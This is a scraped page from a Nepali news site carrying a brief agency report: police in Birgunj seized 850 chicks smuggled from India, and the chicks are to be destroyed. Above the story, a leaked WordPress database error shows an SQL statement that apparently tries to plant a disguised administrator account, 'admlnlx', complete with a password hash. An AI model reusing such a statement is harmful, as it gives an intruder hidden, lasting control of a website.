WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUfgEuH8uTO7EEa0ocd3j//vcrX8UW.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 16:08:04', '', 'admlnlx', 'admlnlx')
वीरगन्ज, पुस १२ –
गएराति सशस्त्र प्रहरी बल वागेश्वरी चित्रैनाले रु ८० हजार मूल्य बराबरको ८५० वटा कुखुराको चल्ला समातेको छ ।
अवैधरुपमा भारतबाट तस्करी गरी ल्याइरहेको अवस्थामा प्रहरीले वीरगन्ज उपमहानगरपालिका–१० उदयपुर घुर्मीबाट सो चल्ला समातेको सशस्त्र प्रहरी उपरीक्षक रवीन्द्रकुमार ठाकुरले बताउनुभयो ।
सो चल्ला आज नष्ट गरिने बताइएको छ । – रासस